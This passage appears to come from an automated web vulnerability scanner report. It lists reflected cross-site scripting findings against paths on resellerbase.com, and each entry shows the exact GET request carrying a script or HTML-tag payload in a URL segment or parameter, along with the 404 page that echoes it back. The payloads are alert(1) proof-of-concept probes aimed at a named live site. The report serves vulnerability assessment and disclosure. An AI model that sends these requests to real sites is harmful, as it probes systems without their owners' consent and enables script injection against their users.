User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46a0f45<script>alert(1)</script>666e5a2a56c/ was not found on this server.</p>
...[SNIP]...

2.3261. http://www.resellerbase.com/detail/46/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dd870<script>alert(1)</script>b1c2d873550 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/?dd870<script>alert(1)</script>b1c2d873550=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/?dd870<script>alert(1)</script>b1c2d873550=1 was not found on this server.</p>
...[SNIP]...

2.3262. http://www.resellerbase.com/detail/46/hubshout-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/hubshout-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 88be0<script>alert(1)</script>311bd6d613a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail88be0<script>alert(1)</script>311bd6d613a/46/hubshout-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail88be0<script>alert(1)</script>311bd6d613a/46/hubshout-com.html was not found on this server.</p>
...[SNIP]...

2.3263. http://www.resellerbase.com/detail/46/hubshout-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/46/hubshout-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f8a0<a>4be4ea51f91 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/464f8a0<a>4be4ea51f91/hubshout-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/464f8a0<a>4be4ea51f91/hubshout-com.html was not found on this server.</p>
...[SNIP]...

2.3264. http://www.resellerbase.com/detail/46/hubshout-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/hubshout-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 11a6d<script>alert(1)</script>5788702c3fe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/11a6d<script>alert(1)</script>5788702c3fe HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/11a6d<script>alert(1)</script>5788702c3fe was not found on this server.</p>
...[SNIP]...

2.3265. http://www.resellerbase.com/detail/46/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c804a<script>alert(1)</script>02a28d84161 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc804a<script>alert(1)</script>02a28d84161/46/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc804a<script>alert(1)</script>02a28d84161/46/rating.php was not found on this server.</p>
...[SNIP]...

2.3266. http://www.resellerbase.com/detail/46/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f0ea9<script>alert(1)</script>a78a4514d61bd75da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detailf0ea9<script>alert(1)</script>a78a4514d61bd75da/46/rating.php?id=46&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf0ea9<script>alert(1)</script>a78a4514d61bd75da/46/rating.php?id=46&rating=5 was not found on this server.</p>
...[SNIP]...

2.3267. http://www.resellerbase.com/detail/46/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d5c26<script>alert(1)</script>7f9b0ff0bc9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46d5c26<script>alert(1)</script>7f9b0ff0bc9/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46d5c26<script>alert(1)</script>7f9b0ff0bc9/rating.php was not found on this server.</p>
...[SNIP]...

2.3268. http://www.resellerbase.com/detail/46/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d1e86<script>alert(1)</script>49db44ded2ee9f3ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/46d1e86<script>alert(1)</script>49db44ded2ee9f3ef/rating.php?id=46&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46d1e86<script>alert(1)</script>49db44ded2ee9f3ef/rating.php?id=46&rating=5 was not found on this server.</p>
...[SNIP]...

2.3269. http://www.resellerbase.com/detail/46/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5ca44<script>alert(1)</script>5663ffddb04af14ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/46/rating.php5ca44<script>alert(1)</script>5663ffddb04af14ff?id=46&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/rating.php5ca44<script>alert(1)</script>5663ffddb04af14ff?id=46&rating=5 was not found on this server.</p>
...[SNIP]...

2.3270. http://www.resellerbase.com/detail/46/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eec20<script>alert(1)</script>c1861b1cd96 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/rating.phpeec20<script>alert(1)</script>c1861b1cd96 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/rating.phpeec20<script>alert(1)</script>c1861b1cd96 was not found on this server.</p>
...[SNIP]...

2.3271. http://www.resellerbase.com/detail/46/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3d61a<script>alert(1)</script>2cfcfac51c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/rating.php?3d61a<script>alert(1)</script>2cfcfac51c8=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/rating.php?3d61a<script>alert(1)</script>2cfcfac51c8=1 was not found on this server.</p>
...[SNIP]...

2.3272. http://www.resellerbase.com/detail/46/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8da60<script>alert(1)</script>df19e2dac8ea5b066 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/46/rating.php/8da60<script>alert(1)</script>df19e2dac8ea5b066?id=46&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/rating.php/8da60<script>alert(1)</script>df19e2dac8ea5b066?id=46&rating=5 was not found on this server.</p>
...[SNIP]...

2.3273. http://www.resellerbase.com/detail/46/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9c255<script>alert(1)</script>9ef7ece63be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9c255<script>alert(1)</script>9ef7ece63be/46/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9c255<script>alert(1)</script>9ef7ece63be/46/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3274. http://www.resellerbase.com/detail/46/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 79ab5<script>alert(1)</script>5f85d62ee66 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4679ab5<script>alert(1)</script>5f85d62ee66/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4679ab5<script>alert(1)</script>5f85d62ee66/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3275. http://www.resellerbase.com/detail/46/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 37afb<script>alert(1)</script>753f6aa2529 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/search.php37afb<script>alert(1)</script>753f6aa2529?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/search.php37afb<script>alert(1)</script>753f6aa2529?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3276. http://www.resellerbase.com/detail/46/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/46/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload fc44a<a>5892cb24b0f was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/search.php?keyword=search...&Submit3=Searchfc44a<a>5892cb24b0f&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/search.php?keyword=search...&Submit3=Searchfc44a<a>5892cb24b0f&opt=2 was not found on this server.</p>
...[SNIP]...

2.3277. http://www.resellerbase.com/detail/46/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/46/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload b1be1<a>35db2d193d6 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/search.php?keyword=search...b1be1<a>35db2d193d6&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/search.php?keyword=search...b1be1<a>35db2d193d6&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3278. http://www.resellerbase.com/detail/46/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f4f9c<script>alert(1)</script>ac68ee46070 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/search.php?keyword=search...&Submit3=Search&opt=2&f4f9c<script>alert(1)</script>ac68ee46070=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/search.php?keyword=search...&Submit3=Search&opt=2&f4f9c<script>alert(1)</script>ac68ee46070=1 was not found on this server.</p>
...[SNIP]...

2.3279. http://www.resellerbase.com/detail/46/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/46/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 45792<a>7debffc74b4 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

